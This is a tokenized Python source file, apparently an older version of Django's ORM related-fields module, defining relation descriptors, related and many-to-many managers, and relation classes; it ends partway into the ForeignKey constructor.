<s> from operator import attrgetter <EOL> from django . db import connection , connections , router <EOL> from django . db . backends import util <EOL> from django . db . models import signals , get_model <EOL> from django . db . models . fields import ( AutoField , Field , IntegerField , <EOL> PositiveIntegerField , PositiveSmallIntegerField , FieldDoesNotExist ) <EOL> from django . db . models . related import RelatedObject <EOL> from django . db . models . query import QuerySet <EOL> from django . db . models . query_utils import QueryWrapper <EOL> from django . db . models . deletion import CASCADE <EOL> from django . utils . encoding import smart_text <EOL> from django . utils import six <EOL> from django . utils . translation import ugettext_lazy as _ , string_concat <EOL> from django . utils . functional import curry , cached_property <EOL> from django . core import exceptions <EOL> from django import forms <EOL> RECURSIVE_RELATIONSHIP_CONSTANT = '<STR_LIT>' <EOL> pending_lookups = { } <EOL> def add_lazy_relation ( cls , field , relation , operation ) : <EOL> """<STR_LIT>""" <EOL> if relation == RECURSIVE_RELATIONSHIP_CONSTANT : <EOL> app_label = cls . _meta . app_label <EOL> model_name = cls . __name__ <EOL> else : <EOL> if isinstance ( relation , six . string_types ) : <EOL> try : <EOL> app_label , model_name = relation . split ( "<STR_LIT:.>" ) <EOL> except ValueError : <EOL> app_label = cls . _meta . app_label <EOL> model_name = relation <EOL> else : <EOL> app_label = relation . _meta . app_label <EOL> model_name = relation . _meta . object_name <EOL> model = get_model ( app_label , model_name , <EOL> seed_cache = False , only_installed = False ) <EOL> if model : <EOL> operation ( field , model , cls ) <EOL> else : <EOL> key = ( app_label , model_name ) <EOL> value = ( cls , field , operation ) <EOL> pending_lookups . setdefault ( key , [ ] ) . append ( value ) <EOL> def do_pending_lookups ( sender , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> key = ( sender . _meta . app_label , sender . __name__ ) <EOL> for cls , field , operation in pending_lookups . pop ( key , [ ] ) : <EOL> operation ( field , sender , cls ) <EOL> signals . class_prepared . connect ( do_pending_lookups ) <EOL> class RelatedField ( object ) : <EOL> def contribute_to_class ( self , cls , name ) : <EOL> sup = super ( RelatedField , self ) <EOL> self . opts = cls . _meta <EOL> if hasattr ( sup , '<STR_LIT>' ) : <EOL> sup . contribute_to_class ( cls , name ) <EOL> if not cls . _meta . abstract and self . rel . related_name : <EOL> self . rel . related_name = self . rel . related_name % { <EOL> '<STR_LIT:class>' : cls . __name__ . lower ( ) , <EOL> '<STR_LIT>' : cls . _meta . app_label . lower ( ) , <EOL> } <EOL> other = self . rel . to <EOL> if isinstance ( other , six . string_types ) or other . _meta . pk is None : <EOL> def resolve_related_class ( field , model , cls ) : <EOL> field . rel . to = model <EOL> field . do_related_class ( model , cls ) <EOL> add_lazy_relation ( cls , self , other , resolve_related_class ) <EOL> else : <EOL> self . do_related_class ( other , cls ) <EOL> def set_attributes_from_rel ( self ) : <EOL> self . name = self . name or ( self . rel . to . _meta . object_name . lower ( ) + '<STR_LIT:_>' + self . rel . to . _meta . pk . name ) <EOL> if self . verbose_name is None : <EOL> self . verbose_name = self . rel . to . _meta . verbose_name <EOL> self . rel . field_name = self . rel . field_name or self . rel . to . _meta . pk . name <EOL> def do_related_class ( self , other , cls ) : <EOL> self . set_attributes_from_rel ( ) <EOL> self . related = RelatedObject ( other , cls , self ) <EOL> if not cls . _meta . abstract : <EOL> self . contribute_to_related_class ( other , self . related ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value . prepare ( ) <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value . _prepare ( ) <EOL> if lookup_type in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . _pk_trace ( value , '<STR_LIT>' , lookup_type ) <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ self . _pk_trace ( v , '<STR_LIT>' , lookup_type ) for v in value ] <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return [ ] <EOL> raise TypeError ( "<STR_LIT>" % lookup_type ) <EOL> def get_db_prep_lookup ( self , lookup_type , value , connection , prepared = False ) : <EOL> if not prepared : <EOL> value = self . get_prep_lookup ( lookup_type , value ) <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> value = value . get_compiler ( connection = connection ) <EOL> if hasattr ( value , '<STR_LIT>' ) or hasattr ( value , '<STR_LIT>' ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> sql , params = value . as_sql ( ) <EOL> else : <EOL> sql , params = value . _as_sql ( connection = connection ) <EOL> return QueryWrapper ( ( '<STR_LIT>' % sql ) , params ) <EOL> if lookup_type in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return [ self . _pk_trace ( value , '<STR_LIT>' , lookup_type , <EOL> connection = connection , prepared = prepared ) ] <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ self . _pk_trace ( v , '<STR_LIT>' , lookup_type , <EOL> connection = connection , prepared = prepared ) <EOL> for v in value ] <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return [ ] <EOL> raise TypeError ( "<STR_LIT>" % lookup_type ) <EOL> def _pk_trace ( self , value , prep_func , lookup_type , ** kwargs ) : <EOL> v = value <EOL> if isinstance ( v , self . rel . to ) : <EOL> field_name = getattr ( self . rel , "<STR_LIT>" , None ) <EOL> else : <EOL> field_name = None <EOL> try : <EOL> while True : <EOL> if field_name is None : <EOL> field_name = v . _meta . pk . name <EOL> v = getattr ( v , field_name ) <EOL> field_name = None <EOL> except AttributeError : <EOL> pass <EOL> except exceptions . ObjectDoesNotExist : <EOL> v = None <EOL> field = self <EOL> while field . rel : <EOL> if hasattr ( field . rel , '<STR_LIT>' ) : <EOL> field = field . rel . to . _meta . get_field ( field . rel . field_name ) <EOL> else : <EOL> field = field . rel . to . _meta . pk <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v = [ v ] <EOL> v = getattr ( field , prep_func ) ( lookup_type , v , ** kwargs ) <EOL> if isinstance ( v , list ) : <EOL> v = v [ <NUM_LIT:0> ] <EOL> return v <EOL> def related_query_name ( self ) : <EOL> return self . rel . related_name or self . opts . object_name . lower ( ) <EOL> class SingleRelatedObjectDescriptor ( object ) : <EOL> def __init__ ( self , related ) : <EOL> self . related = related <EOL> self . cache_name = related . get_cache_name ( ) <EOL> def is_cached ( self , instance ) : <EOL> return hasattr ( instance , self . cache_name ) <EOL> def get_query_set ( self , ** db_hints ) : <EOL> db = router . db_for_read ( self . related . model , ** db_hints ) <EOL> return self . related . model . _base_manager . using ( db ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> rel_obj_attr = attrgetter ( self . related . field . attname ) <EOL> instance_attr = lambda obj : obj . _get_pk_val ( ) <EOL> instances_dict = dict ( ( instance_attr ( inst ) , inst ) for inst in instances ) <EOL> params = { '<STR_LIT>' % self . related . field . name : list ( instances_dict ) } <EOL> qs = self . get_query_set ( instance = instances [ <NUM_LIT:0> ] ) . filter ( ** params ) <EOL> rel_obj_cache_name = self . related . field . get_cache_name ( ) <EOL> for rel_obj in qs : <EOL> instance = instances_dict [ rel_obj_attr ( rel_obj ) ] <EOL> setattr ( rel_obj , rel_obj_cache_name , instance ) <EOL> return qs , rel_obj_attr , instance_attr , True , self . cache_name <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> try : <EOL> rel_obj = getattr ( instance , self . cache_name ) <EOL> except AttributeError : <EOL> related_pk = instance . _get_pk_val ( ) <EOL> if related_pk is None : <EOL> rel_obj = None <EOL> else : <EOL> params = { '<STR_LIT>' % self . related . field . name : related_pk } <EOL> try : <EOL> rel_obj = self . get_query_set ( instance = instance ) . get ( ** params ) <EOL> except self . related . model . DoesNotExist : <EOL> rel_obj = None <EOL> else : <EOL> setattr ( rel_obj , self . related . field . get_cache_name ( ) , instance ) <EOL> setattr ( instance , self . cache_name , rel_obj ) <EOL> if rel_obj is None : <EOL> raise self . related . model . DoesNotExist <EOL> else : <EOL> return rel_obj <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" % self . related . opts . object_name ) <EOL> if value is None and self . related . field . null == False : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( instance . _meta . object_name , self . related . get_accessor_name ( ) ) ) <EOL> elif value is not None and not isinstance ( value , self . related . model ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _meta . object_name , <EOL> self . related . get_accessor_name ( ) , self . related . opts . object_name ) ) <EOL> elif value is not None : <EOL> if instance . _state . db is None : <EOL> instance . _state . db = router . db_for_write ( instance . __class__ , instance = value ) <EOL> elif value . _state . db is None : <EOL> value . _state . db = router . db_for_write ( value . __class__ , instance = instance ) <EOL> elif value . _state . db is not None and instance . _state . db is not None : <EOL> if not router . allow_relation ( value , instance ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _state . db , value . _state . db ) ) <EOL> related_pk = getattr ( instance , self . related . field . rel . get_related_field ( ) . attname ) <EOL> if related_pk is None : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _meta . object_name ) ) <EOL> setattr ( value , self . related . field . attname , related_pk ) <EOL> setattr ( instance , self . cache_name , value ) <EOL> setattr ( value , self . related . field . get_cache_name ( ) , instance ) <EOL> class ReverseSingleRelatedObjectDescriptor ( object ) : <EOL> def __init__ ( self , field_with_rel ) : <EOL> self . field = field_with_rel <EOL> self . cache_name = self . field . get_cache_name ( ) <EOL> def is_cached ( self , instance ) : <EOL> return hasattr ( instance , self . cache_name ) <EOL> def get_query_set ( self , ** db_hints ) : <EOL> db = router . db_for_read ( self . field . rel . to , ** db_hints ) <EOL> rel_mgr = self . field . rel . to . _default_manager <EOL> if getattr ( rel_mgr , '<STR_LIT>' , False ) : <EOL> return rel_mgr . using ( db ) <EOL> else : <EOL> return QuerySet ( self . field . rel . to ) . using ( db ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> other_field = self . field . rel . get_related_field ( ) <EOL> rel_obj_attr = attrgetter ( other_field . attname ) <EOL> instance_attr = attrgetter ( self . field . attname ) <EOL> instances_dict = dict ( ( instance_attr ( inst ) , inst ) for inst in instances ) <EOL> if other_field . rel : <EOL> params = { '<STR_LIT>' % self . field . rel . field_name : list ( instances_dict ) } <EOL> else : <EOL> params = { '<STR_LIT>' % self . field . rel . field_name : list ( instances_dict ) } <EOL> qs = self . get_query_set ( instance = instances [ <NUM_LIT:0> ] ) . filter ( ** params ) <EOL> if not self . field . rel . multiple : <EOL> rel_obj_cache_name = self . field . related . get_cache_name ( ) <EOL> for rel_obj in qs : <EOL> instance = instances_dict [ rel_obj_attr ( rel_obj ) ] <EOL> setattr ( rel_obj , rel_obj_cache_name , instance ) <EOL> return qs , rel_obj_attr , instance_attr , True , self . cache_name <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> try : <EOL> rel_obj = getattr ( instance , self . cache_name ) <EOL> except AttributeError : <EOL> val = getattr ( instance , self . field . attname ) <EOL> if val is None : <EOL> rel_obj = None <EOL> else : <EOL> other_field = self . field . rel . get_related_field ( ) <EOL> if other_field . rel : <EOL> params = { '<STR_LIT>' % ( self . field . rel . field_name , other_field . rel . field_name ) : val } <EOL> else : <EOL> params = { '<STR_LIT>' % self . field . rel . field_name : val } <EOL> qs = self . get_query_set ( instance = instance ) <EOL> rel_obj = qs . get ( ** params ) <EOL> if not self . field . rel . multiple : <EOL> setattr ( rel_obj , self . field . related . get_cache_name ( ) , instance ) <EOL> setattr ( instance , self . cache_name , rel_obj ) <EOL> if rel_obj is None and not self . field . null : <EOL> raise self . field . rel . to . DoesNotExist <EOL> else : <EOL> return rel_obj <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" % self . field . name ) <EOL> if value is None and self . field . null == False : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( instance . _meta . object_name , self . field . name ) ) <EOL> elif value is not None and not isinstance ( value , self . field . rel . to ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _meta . object_name , <EOL> self . field . name , self . field . rel . to . _meta . object_name ) ) <EOL> elif value is not None : <EOL> if instance . _state . db is None : <EOL> instance . _state . db = router . db_for_write ( instance . __class__ , instance = value ) <EOL> elif value . _state . db is None : <EOL> value . _state . db = router . db_for_write ( value . __class__ , instance = instance ) <EOL> elif value . _state . db is not None and instance . _state . db is not None : <EOL> if not router . allow_relation ( value , instance ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _state . db , value . _state . db ) ) <EOL> if value is None : <EOL> related = getattr ( instance , self . cache_name , None ) <EOL> if related is not None : <EOL> setattr ( related , self . field . related . get_cache_name ( ) , None ) <EOL> try : <EOL> val = getattr ( value , self . field . rel . get_related_field ( ) . attname ) <EOL> except AttributeError : <EOL> val = None <EOL> setattr ( instance , self . field . attname , val ) <EOL> setattr ( instance , self . cache_name , value ) <EOL> if value is not None and not self . field . rel . multiple : <EOL> setattr ( value , self . field . related . get_cache_name ( ) , instance ) <EOL> class ForeignRelatedObjectsDescriptor ( object ) : <EOL> def __init__ ( self , related ) : <EOL> self . related = related <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> return self . related_manager_cls ( instance ) <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> manager = self . __get__ ( instance ) <EOL> if self . related . field . null : <EOL> manager . clear ( ) <EOL> manager . add ( * value ) <EOL> @ cached_property <EOL> def related_manager_cls ( self ) : <EOL> superclass = self . related . model . _default_manager . __class__ <EOL> rel_field = self . related . field <EOL> rel_model = self . related . model <EOL> attname = rel_field . rel . get_related_field ( ) . attname <EOL> class RelatedManager ( superclass ) : <EOL> def __init__ ( self , instance ) : <EOL> super ( RelatedManager , self ) . __init__ ( ) <EOL> self . instance = instance <EOL> self . core_filters = { <EOL> '<STR_LIT>' % ( rel_field . name , attname ) : getattr ( instance , attname ) <EOL> } <EOL> self . model = rel_model <EOL> def get_query_set ( self ) : <EOL> try : <EOL> return self . instance . _prefetched_objects_cache [ rel_field . related_query_name ( ) ] <EOL> except ( AttributeError , KeyError ) : <EOL> db = self . _db or router . db_for_read ( self . model , instance = self . instance ) <EOL> qs = super ( RelatedManager , self ) . get_query_set ( ) . using ( db ) . filter ( ** self . core_filters ) <EOL> val = getattr ( self . instance , attname ) <EOL> if val is None or val == '<STR_LIT>' and connections [ db ] . features . interprets_empty_strings_as_nulls : <EOL> return qs . filter ( pk__in = [ ] ) <EOL> qs . _known_related_objects = { rel_field : { self . instance . pk : self . instance } } <EOL> return qs <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> rel_obj_attr = attrgetter ( rel_field . attname ) <EOL> instance_attr = attrgetter ( attname ) <EOL> instances_dict = dict ( ( instance_attr ( inst ) , inst ) for inst in instances ) <EOL> db = self . _db or router . db_for_read ( self . model , instance = instances [ <NUM_LIT:0> ] ) <EOL> query = { '<STR_LIT>' % ( rel_field . name , attname ) : list ( instances_dict ) } <EOL> qs = super ( RelatedManager , self ) . get_query_set ( ) . using ( db ) . filter ( ** query ) <EOL> for rel_obj in qs : <EOL> instance = instances_dict [ rel_obj_attr ( rel_obj ) ] <EOL> setattr ( rel_obj , rel_field . name , instance ) <EOL> cache_name = rel_field . related_query_name ( ) <EOL> return qs , rel_obj_attr , instance_attr , False , cache_name <EOL> def add ( self , * objs ) : <EOL> for obj in objs : <EOL> if not isinstance ( obj , self . model ) : <EOL> raise TypeError ( "<STR_LIT>" % ( self . model . _meta . object_name , obj ) ) <EOL> setattr ( obj , rel_field . name , self . instance ) <EOL> obj . save ( ) <EOL> add . alters_data = True <EOL> def create ( self , ** kwargs ) : <EOL> kwargs [ rel_field . name ] = self . instance <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> return super ( RelatedManager , self . db_manager ( db ) ) . create ( ** kwargs ) <EOL> create . alters_data = True <EOL> def get_or_create ( self , ** kwargs ) : <EOL> kwargs [ rel_field . name ] = self . instance <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> return super ( RelatedManager , self . db_manager ( db ) ) . get_or_create ( ** kwargs ) <EOL> get_or_create . alters_data = True <EOL> if rel_field . null : <EOL> def remove ( self , * objs ) : <EOL> val = getattr ( self . instance , attname ) <EOL> for obj in objs : <EOL> if getattr ( obj , rel_field . attname ) == val : <EOL> setattr ( obj , rel_field . name , None ) <EOL> obj . save ( ) <EOL> else : <EOL> raise rel_field . rel . to . DoesNotExist ( "<STR_LIT>" % ( obj , self . instance ) ) <EOL> remove . alters_data = True <EOL> def clear ( self ) : <EOL> self . update ( ** { rel_field . name : None } ) <EOL> clear . alters_data = True <EOL> return RelatedManager <EOL> def create_many_related_manager ( superclass , rel ) : <EOL> """<STR_LIT>""" <EOL> class ManyRelatedManager ( superclass ) : <EOL> def __init__ ( self , model = None , query_field_name = None , instance = None , symmetrical = None , <EOL> source_field_name = None , target_field_name = None , reverse = False , <EOL> through = None , prefetch_cache_name = None ) : <EOL> super ( ManyRelatedManager , self ) . __init__ ( ) <EOL> self . model = model <EOL> self . query_field_name = query_field_name <EOL> self . core_filters = { '<STR_LIT>' % query_field_name : instance . _get_pk_val ( ) } <EOL> self . instance = instance <EOL> self . symmetrical = symmetrical <EOL> self . source_field_name = source_field_name <EOL> self . target_field_name = target_field_name <EOL> self . reverse = reverse <EOL> self . through = through <EOL> self . prefetch_cache_name = prefetch_cache_name <EOL> self . _fk_val = self . _get_fk_val ( instance , source_field_name ) <EOL> if self . _fk_val is None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( instance , source_field_name ) ) <EOL> if instance . pk is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> instance . __class__ . __name__ ) <EOL> def _get_fk_val ( self , obj , field_name ) : <EOL> """<STR_LIT>""" <EOL> if not self . through : <EOL> return obj . pk <EOL> fk = self . through . _meta . get_field ( field_name ) <EOL> if fk . rel . field_name and fk . rel . field_name != fk . rel . to . _meta . pk . attname : <EOL> attname = fk . rel . get_related_field ( ) . get_attname ( ) <EOL> return fk . get_prep_lookup ( '<STR_LIT>' , getattr ( obj , attname ) ) <EOL> else : <EOL> return obj . pk <EOL> def get_query_set ( self ) : <EOL> try : <EOL> return self . instance . _prefetched_objects_cache [ self . prefetch_cache_name ] <EOL> except ( AttributeError , KeyError ) : <EOL> db = self . _db or router . db_for_read ( self . instance . __class__ , instance = self . instance ) <EOL> return super ( ManyRelatedManager , self ) . get_query_set ( ) . using ( db ) . _next_is_sticky ( ) . filter ( ** self . core_filters ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> instance = instances [ <NUM_LIT:0> ] <EOL> from django . db import connections <EOL> db = self . _db or router . db_for_read ( instance . __class__ , instance = instance ) <EOL> query = { '<STR_LIT>' % self . query_field_name : <EOL> set ( obj . _get_pk_val ( ) for obj in instances ) } <EOL> qs = super ( ManyRelatedManager , self ) . get_query_set ( ) . using ( db ) . _next_is_sticky ( ) . filter ( ** query ) <EOL> fk = self . through . _meta . get_field ( self . source_field_name ) <EOL> source_col = fk . column <EOL> join_table = self . through . _meta . db_table <EOL> connection = connections [ db ] <EOL> qn = connection . ops . quote_name <EOL> qs = qs . extra ( select = { '<STR_LIT>' : <EOL> '<STR_LIT>' % ( qn ( join_table ) , qn ( source_col ) ) } ) <EOL> select_attname = fk . rel . get_related_field ( ) . get_attname ( ) <EOL> return ( qs , <EOL> attrgetter ( '<STR_LIT>' ) , <EOL> attrgetter ( select_attname ) , <EOL> False , <EOL> self . prefetch_cache_name ) <EOL> if rel . through . _meta . auto_created : <EOL> def add ( self , * objs ) : <EOL> self . _add_items ( self . source_field_name , self . target_field_name , * objs ) <EOL> if self . symmetrical : <EOL> self . _add_items ( self . target_field_name , self . source_field_name , * objs ) <EOL> add . alters_data = True <EOL> def remove ( self , * objs ) : <EOL> self . _remove_items ( self . source_field_name , self . target_field_name , * objs ) <EOL> if self . symmetrical : <EOL> self . _remove_items ( self . target_field_name , self . source_field_name , * objs ) <EOL> remove . alters_data = True <EOL> def clear ( self ) : <EOL> self . _clear_items ( self . source_field_name ) <EOL> if self . symmetrical : <EOL> self . _clear_items ( self . target_field_name ) <EOL> clear . alters_data = True <EOL> def create ( self , ** kwargs ) : <EOL> if not self . through . _meta . auto_created : <EOL> opts = self . through . _meta <EOL> raise AttributeError ( "<STR_LIT>" % ( opts . app_label , opts . object_name ) ) <EOL> db = router . db_for_write ( self . instance . __class__ , instance = self . instance ) <EOL> new_obj = super ( ManyRelatedManager , self . db_manager ( db ) ) . create ( ** kwargs ) <EOL> self . add ( new_obj ) <EOL> return new_obj <EOL> create . alters_data = True <EOL> def get_or_create ( self , ** kwargs ) : <EOL> db = router . db_for_write ( self . instance . __class__ , instance = self . instance ) <EOL> obj , created = super ( ManyRelatedManager , self . db_manager ( db ) ) . get_or_create ( ** kwargs ) <EOL> if created : <EOL> self . add ( obj ) <EOL> return obj , created <EOL> get_or_create . alters_data = True <EOL> def _add_items ( self , source_field_name , target_field_name , * objs ) : <EOL> from django . db . models import Model <EOL> if objs : <EOL> new_ids = set ( ) <EOL> for obj in objs : <EOL> if isinstance ( obj , self . model ) : <EOL> if not router . allow_relation ( obj , self . instance ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( obj , self . instance . _state . db , obj . _state . db ) ) <EOL> fk_val = self . _get_fk_val ( obj , target_field_name ) <EOL> if fk_val is None : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( obj , target_field_name ) ) <EOL> new_ids . add ( self . _get_fk_val ( obj , target_field_name ) ) <EOL> elif isinstance ( obj , Model ) : <EOL> raise TypeError ( "<STR_LIT>" % ( self . model . _meta . object_name , obj ) ) <EOL> else : <EOL> new_ids . add ( obj ) <EOL> db = router . db_for_write ( self . through , instance = self . instance ) <EOL> vals = self . through . _default_manager . using ( db ) . values_list ( target_field_name , flat = True ) <EOL> vals = vals . filter ( ** { <EOL> source_field_name : self . _fk_val , <EOL> '<STR_LIT>' % target_field_name : new_ids , <EOL> } ) <EOL> new_ids = new_ids - set ( vals ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = '<STR_LIT>' , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = new_ids , using = db ) <EOL> self . through . _default_manager . using ( db ) . bulk_create ( [ <EOL> self . through ( ** { <EOL> '<STR_LIT>' % source_field_name : self . _fk_val , <EOL> '<STR_LIT>' % target_field_name : obj_id , <EOL> } ) <EOL> for obj_id in new_ids <EOL> ] ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = '<STR_LIT>' , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = new_ids , using = db ) <EOL> def _remove_items ( self , source_field_name , target_field_name , * objs ) : <EOL> if objs : <EOL> old_ids = set ( ) <EOL> for obj in objs : <EOL> if isinstance ( obj , self . model ) : <EOL> old_ids . add ( self . _get_fk_val ( obj , target_field_name ) ) <EOL> else : <EOL> old_ids . add ( obj ) <EOL> db = router . db_for_write ( self . through , instance = self . instance ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = "<STR_LIT>" , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = old_ids , using = db ) <EOL> self . through . _default_manager . using ( db ) . filter ( ** { <EOL> source_field_name : self . _fk_val , <EOL> '<STR_LIT>' % target_field_name : old_ids <EOL> } ) . delete ( ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = "<STR_LIT>" , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = old_ids , using = db ) <EOL> def _clear_items ( self , source_field_name ) : <EOL> db = router . db_for_write ( self . through , instance = self . instance ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = "<STR_LIT>" , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = None , using = db ) <EOL> self . through . _default_manager . using ( db ) . filter ( ** { <EOL> source_field_name : self . _fk_val <EOL> } ) . delete ( ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = "<STR_LIT>" , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = None , using = db ) <EOL> return ManyRelatedManager <EOL> class ManyRelatedObjectsDescriptor ( object ) : <EOL> def __init__ ( self , related ) : <EOL> self . related = related <EOL> @ cached_property <EOL> def related_manager_cls ( self ) : <EOL> return create_many_related_manager ( <EOL> self . related . model . _default_manager . __class__ , <EOL> self . related . field . rel <EOL> ) <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> rel_model = self . related . model <EOL> manager = self . related_manager_cls ( <EOL> model = rel_model , <EOL> query_field_name = self . related . field . name , <EOL> prefetch_cache_name = self . related . field . related_query_name ( ) , <EOL> instance = instance , <EOL> symmetrical = False , <EOL> source_field_name = self . related . field . m2m_reverse_field_name ( ) , <EOL> target_field_name = self . related . field . m2m_field_name ( ) , <EOL> reverse = True , <EOL> through = self . related . field . rel . through , <EOL> ) <EOL> return manager <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> if not self . related . field . rel . through . _meta . auto_created : <EOL> opts = self . related . field . rel . through . _meta <EOL> raise AttributeError ( "<STR_LIT>" % ( opts . app_label , opts . object_name ) ) <EOL> manager = self . __get__ ( instance ) <EOL> manager . clear ( ) <EOL> manager . add ( * value ) <EOL> class ReverseManyRelatedObjectsDescriptor ( object ) : <EOL> def __init__ ( self , m2m_field ) : <EOL> self . field = m2m_field <EOL> @ property <EOL> def through ( self ) : <EOL> return self . field . rel . through <EOL> @ cached_property <EOL> def related_manager_cls ( self ) : <EOL> return create_many_related_manager ( <EOL> self . field . rel . to . _default_manager . __class__ , <EOL> self . field . rel <EOL> ) <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> manager = self . related_manager_cls ( <EOL> model = self . field . rel . to , <EOL> query_field_name = self . field . related_query_name ( ) , <EOL> prefetch_cache_name = self . field . name , <EOL> instance = instance , <EOL> symmetrical = self . field . rel . symmetrical , <EOL> source_field_name = self . field . m2m_field_name ( ) , <EOL> target_field_name = self . field . m2m_reverse_field_name ( ) , <EOL> reverse = False , <EOL> through = self . field . rel . through , <EOL> ) <EOL> return manager <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> if not self . field . rel . through . _meta . auto_created : <EOL> opts = self . field . rel . through . _meta <EOL> raise AttributeError ( "<STR_LIT>" % ( opts . app_label , opts . object_name ) ) <EOL> manager = self . __get__ ( instance ) <EOL> manager . clear ( ) <EOL> manager . add ( * value ) <EOL> class ManyToOneRel ( object ) : <EOL> def __init__ ( self , to , field_name , related_name = None , limit_choices_to = None , <EOL> parent_link = False , on_delete = None ) : <EOL> try : <EOL> to . _meta <EOL> except AttributeError : <EOL> assert isinstance ( to , six . string_types ) , "<STR_LIT>" % RECURSIVE_RELATIONSHIP_CONSTANT <EOL> self . to , self . field_name = to , field_name <EOL> self . related_name = related_name <EOL> if limit_choices_to is None : <EOL> limit_choices_to = { } <EOL> self . limit_choices_to = limit_choices_to <EOL> self . multiple = True <EOL> self . parent_link = parent_link <EOL> self . on_delete = on_delete <EOL> def is_hidden ( self ) : <EOL> "<STR_LIT>" <EOL> return self . related_name and self . related_name [ - <NUM_LIT:1> ] == '<STR_LIT:+>' <EOL> def get_related_field ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . to . _meta . get_field_by_name ( self . field_name ) <EOL> if not data [ <NUM_LIT:2> ] : <EOL> raise FieldDoesNotExist ( "<STR_LIT>" % <EOL> self . field_name ) <EOL> return data [ <NUM_LIT:0> ] <EOL> class OneToOneRel ( ManyToOneRel ) : <EOL> def __init__ ( self , to , field_name , related_name = None , limit_choices_to = None , <EOL> parent_link = False , on_delete = None ) : <EOL> super ( OneToOneRel , self ) . __init__ ( to , field_name , <EOL> related_name = related_name , limit_choices_to = limit_choices_to , <EOL> parent_link = parent_link , on_delete = on_delete <EOL> ) <EOL> self . multiple = False <EOL> class ManyToManyRel ( object ) : <EOL> def __init__ ( self , to , related_name = None , limit_choices_to = None , <EOL> symmetrical = True , through = None ) : <EOL> self . to = to <EOL> self . related_name = related_name <EOL> if limit_choices_to is None : <EOL> limit_choices_to = { } <EOL> self . limit_choices_to = limit_choices_to <EOL> self . symmetrical = symmetrical <EOL> self . multiple = True <EOL> self . through = through <EOL> def is_hidden ( self ) : <EOL> "<STR_LIT>" <EOL> return self . related_name and self . related_name [ - <NUM_LIT:1> ] == '<STR_LIT:+>' <EOL> def get_related_field ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . to . _meta . pk <EOL> class ForeignKey ( RelatedField , Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , to , to_field = None , rel_class = ManyToOneRel , ** kwargs ) : <EOL> try : <EOL> to_name = to . _meta . object_name . lower ( ) <EOL> 